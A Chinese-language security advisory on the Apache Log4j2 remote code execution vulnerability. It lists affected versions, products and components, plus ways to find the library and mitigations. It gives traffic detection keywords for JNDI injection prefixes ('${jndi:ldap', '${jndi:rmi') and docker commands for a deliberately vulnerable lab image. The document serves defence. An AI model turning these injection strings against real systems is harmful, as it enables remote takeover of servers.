【安全通报】Apache Log4j2 远程代码执行漏洞
漏洞描述
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。
在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。由于该漏洞影响范围极广,建议广大用户及时排查相关漏洞,经过白帽汇安全研究院分析确认,目前市面有多款流行的系统都受影响。
该漏洞危害等级:严重
影响范围
Apache Log4j 2.x < 2.15.0-rc2
已知影响组件
- Apache Struts2
- Apache Solr
- Apache Flink
- Apache Druid
- flume
- dubbo
- logstash
- VMware Horizon
- VMware vCenter Server
- VMware HCX
- VMware NSX-T Data Center
- VMware Unified Access Gateway
- VMware WorkspaceOne Access
- VMware Identity Manager`
- VMware vRealize Operations
- VMware vRealize Operations Cloud Proxy
- VMware vRealize Log Insight
- VMware vRealize Automation
- VMware vRealize Lifecycle Manager
- VMware Telco Cloud Automation
- VMware Site Recovery Manager
- VMware Carbon Black Cloud Workload Appliance
- VMware Carbon Black EDR Server
- VMware Tanzu GemFire
- VMware Tanzu Greenplum
- VMware Tanzu Operations Manager
- VMware Tanzu Application Service for VMs
- VMware Tanzu Kubernetes Grid Integrated Edition
- VMware Tanzu Observability by Wavefront Nozzle
- Healthwatch for Tanzu Application Service
- Spring Cloud Services for VMware Tanzu
- Spring Cloud Gateway for VMware Tanzu
- Spring Cloud Gateway for Kubernetes
- API Portal for VMware Tanzu
- Single Sign-On for VMware Tanzu Application Service
- App Metrics
- VMware vCenter Cloud Gateway
- VMware Tanzu SQL with MySQL for VMs
- VMware vRealize Orchestrator
- VMware Cloud Foundation
- VMware Workspace ONE Access Connector
- VMware Horizon DaaS
- VMware Horizon Cloud Connector
受影响开源组件
项目 | 仓库地址 | 版本 |
---|---|---|
elasticsearch(org.elasticsearch) | https://github.com/elastic/elasticsearch | 8.0.0-alpha2 等(共 100 个) |
spring-webflux(org.springframework) | https://github.com/spring-projects/spring-framework | 5.2.6.RELEASE 等(共 40 个) |
druid(com.alibaba) | https://github.com/alibaba/druid | 1.2.8 等(共 68 个) |
hystrix-rx-netty-metrics-stream(com.netflix.hystrix) | https://github.com/Netflix/Hystrix | 1.5.4 等(共 2 个) |
spring-cloud-starter-alibaba-sentinel(com.alibaba.cloud) | https://github.com/alibaba/spring-cloud-alibaba | 2021.1 等(共 14 个) |
spring-boot-starter-ahas-sentinel-client(com.alibaba.csp) | https://github.com/alibaba/Sentinel | 1.3.2 等(共 17 个) |
redisson(org.redisson) | https://github.com/redisson/redisson | 2.2.24 等(共 3 个) |
HikariCP(com.zaxxer) | https://github.com/brettwooldridge/HikariCP | 5.0.0 等(共 27 个) |
zipkin-collector-service(io.zipkin) | https://github.com/openzipkin/zipkin | 1.40.2 等(共 27 个) |
mybatis-plus(com.baomidou) | https://github.com/baomidou/mybatis-plus | 3.4.3.4 等(共 41 个) |
zuul-sample(com.netflix.zuul) | https://github.com/Netflix/zuul | 2.3.0 等(共 10 个) |
watson-data-api-client(com.ibm.watson.data) | https://github.com/OpenAPITools/openapi-generator | 0.1 等(共 1 个) |
spring-boot-admin-sample-consul(de.codecentric) | https://github.com/codecentric/spring-boot-admin | 2.5.4 等(共 40 个) |
jedis(redis.clients) | https://github.com/redis/jedis | jedis-3.6.2 等(共 36 个) |
grpc-benchmarks(io.grpc) | https://github.com/grpc/grpc-java | 1.9.1 等(共 65 个) |
ktor-client-json-tests(io.ktor) | https://github.com/ktorio/ktor | 1.6.7 等(共 32 个) |
gitbucket_2.13(io.github.gitbucket) | https://github.com/gitbucket/gitbucket | 4.32.0 等(共 27 个) |
finagle-zipkin_2.12(com.twitter) | https://github.com/twitter/finagle | 7.1.0 等(共 56 个) |
resilience4j-vertx(io.github.resilience4j) | https://github.com/resilience4j/resilience4j | 0.9.0 等(共 9 个) |
elasticsearch-sql(org.nlpcn) | https://github.com/NLPchina/elasticsearch-sql | 6.8.13.0 等(共 9 个) |
exposed-spring-boot-starter(org.jetbrains.exposed) | https://github.com/JetBrains/Exposed | 0.36.2 等(共 11 个) |
blade-sql2o(com.bladejava) | https://github.com/lets-blade/blade | 1.2.9 等(共 1 个) |
netty-socketio(com.corundumstudio.socketio) | https://github.com/mrniko/netty-socketio | 1.7.19 等(共 8 个) |
springfox-swagger2(io.springfox) | https://github.com/springfox/springfox | 2.10.5 等(共 6 个) |
main_2.12(org.scala-sbt) | https://github.com/sbt/sbt | 1.6.0-RC1 等(共 88 个) |
lettuce-core(io.lettuce) | https://github.com/lettuce-io/lettuce-core | 6.1.5.RELEASE 等(共 42 个) |
repository-azure(org.opensearch.plugin) | https://github.com/opensearch-project/OpenSearch | 1.2.0 等(共 3 个) |
reactor-test(io.projectreactor) | https://github.com/reactor/reactor-core | 3.3.4.RELEASE 等(共 3 个) |
corda-webserver-impl(net.corda) | https://github.com/corda/corda | corda-3.0 等(共 32 个) |
conductor-redis-persistence(com.netflix.conductor) | https://github.com/Netflix/conductor | 3.3.6 等(共 100 个) |
armeria(com.linecorp.armeria) | https://github.com/line/armeria | 0.26.1.Final 等(共 2 个) |
breeze-parent_2.13(org.scalanlp) | https://github.com/scalanlp/breeze | 2.0.1-RC1 等(共 5 个) |
micrometer-core(io.micrometer) | https://github.com/micrometer-metrics/micrometer | 1.8.1 等(共 98 个) |
alink_connector_jdbc_sqlite_flink-1.9_2.11(com.alibaba.alink) | https://github.com/alibaba/Alink | 1.5.1 等(共 3 个) |
initializr-actuator(io.spring.initializr) | https://github.com/spring-io/initializr | 0.9.0 等(共 6 个) |
telegrambots-spring-boot-starter(org.telegram) | https://github.com/rubenlagus/TelegramBots | 4.9.1 等(共 17 个) |
spring-data-elasticsearch(org.springframework.data) | https://github.com/spring-projects/spring-data-elasticsearch | 4.3.0 等(共 86 个) |
feast-common(dev.feast) | https://github.com/feast-dev/feast | 0.9.2 等(共 26 个) |
javamelody-core(net.bull.javamelody) | https://github.com/javamelody/javamelody | 1.88.0 等(共 13 个) |
analytics-zoo-bigdl_0.13.0-spark_3.0.0(com.intel.analytics.zoo) | https://github.com/intel-analytics/analytics-zoo | 0.11.0-RC1 等(共 4 个) |
scio-tensorflow_2.13(com.spotify) | https://github.com/spotify/scio | 0.9.6 等(共 97 个) |
grpc-client-spring-boot-autoconfigure(net.devh) | https://github.com/yidongnan/grpc-spring-boot-starter | 2.9.0.RELEASE 等(共 16 个) |
inject-server_2.12(com.twitter) | https://github.com/twitter/finatra | 21.9.0 等(共 56 个) |
client-java-examples(io.kubernetes) | https://github.com/kubernetes-client/java | 8.0.2 等(共 1 个) |
reactivesocket-tck-drivers(io.reactivesocket) | https://github.com/rsocket/rsocket-java | 0.6.0 等(共 1 个) |
jest-droid(io.searchbox) | https://github.com/searchbox-io/Jest | 6.3.1 等(共 8 个) |
graphql-dgs-example-java-webflux(com.netflix.graphql.dgs) | https://github.com/Netflix/dgs-framework | 4.9.7 等(共 36 个) |
quill-jdbc-monix_2.11(io.getquill) | https://github.com/getquill/quill | 3.9.0 等(共 62 个) |
doobie-quill_2.12(org.tpolecat) | https://github.com/tpolecat/doobie | 1.0.0-RC1 等(共 61 个) |
http4k(org.http4k) | https://github.com/http4k/http4k | 4.3.4.1 等(共 3 个) |
elasticsearch-hadoop(org.elasticsearch) | https://github.com/elastic/elasticsearch-hadoop | 8.0.0-beta1 等(共 100 个) |
sbt-shading(io.get-coursier) | https://github.com/coursier/coursier | 1.0.0-RC8 等(共 1 个) |
spark-cassandra-connector-unshaded_2.10(com.datastax.spark) | https://github.com/datastax/spark-cassandra-connector | 2.0.9 等(共 54 个) |
webdrivermanager(io.github.bonigarcia) | https://github.com/bonigarcia/webdrivermanager | 4.0.0 等(共 15 个) |
common-auth-v3(com.tencent.bk.devops.ci.common) | https://github.com/Tencent/bk-ci | 1.2.0-rc.7-RELEASE 等(共 3 个) |
reactor-netty(io.projectreactor.netty) | https://github.com/reactor/reactor-netty | 1.0.9 等(共 75 个) |
evcache-client-sample(com.netflix.evcache) | https://github.com/Netflix/EVCache | 5.18.9 等(共 63 个) |
xtdb-test(com.xtdb) | https://github.com/xtdb/xtdb | 1.20.0 等(共 9 个) |
transport-netty4(com.strapdata.elasticsearch.plugin) | https://github.com/strapdata/elassandra | 6.2.3.31 等(共 14 个) |
sbt-metals(org.scalameta) | https://github.com/scalameta/metals | 0.9.9 等(共 17 个) |
elastic4s-embedded_2.12(com.sksamuel.elastic4s) | https://github.com/sksamuel/elastic4s | 6.7.8 等(共 100 个) |
genie-agent(com.netflix.genie) | https://github.com/Netflix/genie | 4.0.4 等(共 100 个) |
spring-kafka(org.springframework.kafka) | https://github.com/spring-projects/spring-kafka | 2.7.9 等(共 79 个) |
db-async-common_2.13(com.dripower) | https://github.com/mauricio/postgresql-async | 0.3.109 等(共 19 个) |
selenide(com.codeborne) | https://github.com/selenide/selenide | 5.25.0-selenium-4.0.0-rc-2 等(共 18 个) |
cloudfoundry-identity-server(org.cloudfoundry.identity) | https://github.com/cloudfoundry/uaa | 4.30.0 等(共 1 个) |
servo-atlas(com.netflix.servo) | https://github.com/Netflix/servo | 0.13.2 等(共 20 个) |
rxnetty-spectator-tcp(io.reactivex) | https://github.com/ReactiveX/RxNetty | 0.5.3-rc.4 等(共 12 个) |
mleap-tensorflow_2.10(ml.combust.mleap) | https://github.com/combust/mleap | 0.9.6 等(共 25 个) |
spark-testing-base_2.12(com.holdenkarau) | https://github.com/holdenk/spark-testing-base | 2.4.4_1.1.1 等(共 100 个) |
graphql-kotlin-spring-client(com.expediagroup) | https://github.com/ExpediaGroup/graphql-kotlin | 5.0.0-alpha.0 等(共 20 个) |
graphql-spring-boot-test-autoconfigure(com.graphql-java-kickstart) | https://github.com/graphql-java-kickstart/graphql-spring-boot | 8.1.1 等(共 33 个) |
discord4j-rest(com.discord4j) | https://github.com/Discord4J/Discord4J | 3.2.1 等(共 15 个) |
twitter-server-logback-classic_2.13(com.twitter) | https://github.com/twitter/twitter-server | 21.9.0 等(共 54 个) |
synthea(org.mitre.synthea) | https://github.com/synthetichealth/synthea | 2.7.0 等(共 2 个) |
spring-integration-redis(org.springframework.integration) | https://github.com/spring-projects/spring-integration | 5.5.6 等(共 30 个) |
cyclops-reactor-integration(com.oath.cyclops) | https://github.com/aol/cyclops | 10.4.0 等(共 1 个) |
akka-stream-alpakka-geode_2.12(com.lightbend.akka) | https://github.com/akka/alpakka | 1.0-M1 等(共 13 个) |
mantis-client(io.mantisrx) | https://github.com/Netflix/mantis | 1.3.9 等(共 83 个) |
mybatis-generator-plugin(com.itfsw) | https://github.com/itfsw/mybatis-generator-plugin | 1.2.9 等(共 31 个) |
ktorm-support-sqlserver(org.ktorm) | https://github.com/kotlin-orm/ktorm | 3.3.0 等(共 11 个) |
gatk(org.broadinstitute) | https://github.com/broadinstitute/gatk | 4.beta.2 等(共 39 个) |
azure-messaging-servicebus(com.azure) | https://github.com/Azure/azure-sdk-for-java | 7.5.1 等(共 100 个) |
mica-metrics(net.dreamlu) | https://github.com/lets-mica/mica | 2.5.7 等(共 7 个) |
shiro-redis(org.crazycake) | https://github.com/alexxiyang/shiro-redis | 3.3.1 等(共 2 个) |
enumeratum-play_2.12(com.beachape) | https://github.com/lloydmeta/enumeratum | 1.5.16 等(共 2 个) |
jdonframework(org.jdon) | https://github.com/banq/jdonframework | 6.6.8 等(共 1 个) |
weid-java-sdk(com.webank) | https://github.com/WeBankBlockchain/WeIdentity | 1.8.1 等(共 3 个) |
log-protocol(io.shulie.pradar) | https://github.com/shulieTech/Takin | 2.0.3 等(共 3 个) |
micro-boot(com.oath.microservices) | https://github.com/aol/micro-server | 1.2.6 等(共 38 个) |
sparkling-water-package_2.11(ai.h2o) | https://github.com/h2oai/sparkling-water | 2.4.10 等(共 36 个) |
scalatest_2.13(au.com.dius.pact.provider) | https://github.com/pact-foundation/pact-jvm | 4.2.4 等(共 5 个) |
mssql-jdbc(com.microsoft.sqlserver) | https://github.com/microsoft/mssql-jdbc | 8.3.0.jre11-preview 等(共 100 个) |
elide-spring-boot-starter(com.yahoo.elide) | https://github.com/yahoo/elide | 6.0.3 等(共 45 个) |
kafka-connect-elastic5(com.datamountaineer) | https://github.com/lensesio/stream-reactor | 1.2.0 等(共 5 个) |
kvision-server-spring-boot-jvm(io.kvision) | https://github.com/rjaros/kvision | 5.4.3 等(共 9 个) |
r2dbc-postgresql(org.postgresql) | https://github.com/pgjdbc/r2dbc-postgresql | 0.9.0.RC1 等(共 8 个) |
play-slick-evolutions_2.13(com.typesafe.play) | https://github.com/playframework/play-slick | 5.0.0-RC3 等(共 29 个) |
sbt-bloop-core(ch.epfl.scala) | https://github.com/scalacenter/bloop | 1.4.8-43-c2d941d9 等(共 29 个) |
jcseg-elasticsearch(org.lionsoul) | https://github.com/lionsoul2014/jcseg | 2.6.2 等(共 7 个) |
更多受影响组件查询,请点击以下链接查询:https://log4j2.huoxian.cn/
漏洞排查
代码排查:查看 pom.xml 是否引入 org.apache.logging.log4j、org.apache.logging.log4j2
Linux:
sudo find / -name "*log4j-*.jar"
Windows:
*log4j*.jar
攻击排查
日志排查:
攻击者在利用前通常采用dnslog方式进行扫描、探测,对于常见利用方式可通过应用系统报错日志中的
"javax.naming.CommunicationException"
"javax.naming.NamingException: problem generating object using object factory"
"Error looking up JNDI resource"关键字进行排查。
流量排查:
攻击者的数据包中可能存在:“${jndi:rmi”、“${jndi:ldap”字样,可根据此类关键字进行排查。
漏洞复现
Vulfocus 靶场环境
目前 Vulfocus 已经集成 Log4j2 环境,可通过以下链接启动环境测试:
http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c
也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行,本地启动命令:docker run -d -P vulfocus/log4j2-rce-2021-12-09:latest
修复建议
1、禁止使用 log4j 服务器外连,升级 idk 11.0.1 8u191 7u201 6u211 或更高版本。
2、升级至 log4j-2.15.0-rc2:
下载地址:https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
3、紧急缓解措施:
(1) 修改 jvm 参数 -Dlog4j2.formatMsgNoLookups=true
(2) 修改配置 log4j2.formatMsgNoLookups=True
(3) 将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置 为 true
参考
[1] https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
[2] [LOG4J2-3201] Limit the protocols jNDI can use and restrict LDAP. - ASF JIRA (apache.org)
[4] https://mp.weixin.qq.com/s/wC7mrK1Y4DYz9_yW4fLzbw
[5] https://help.aliyun.com/noticelist/articleid/1060971232.html
[6] https://mp.weixin.qq.com/s/C4zeXHKHDqPeRuLytO7Fzw
白帽汇从事信息安全,专注于安全大数据、企业威胁情报。
公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。
为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。
最新评论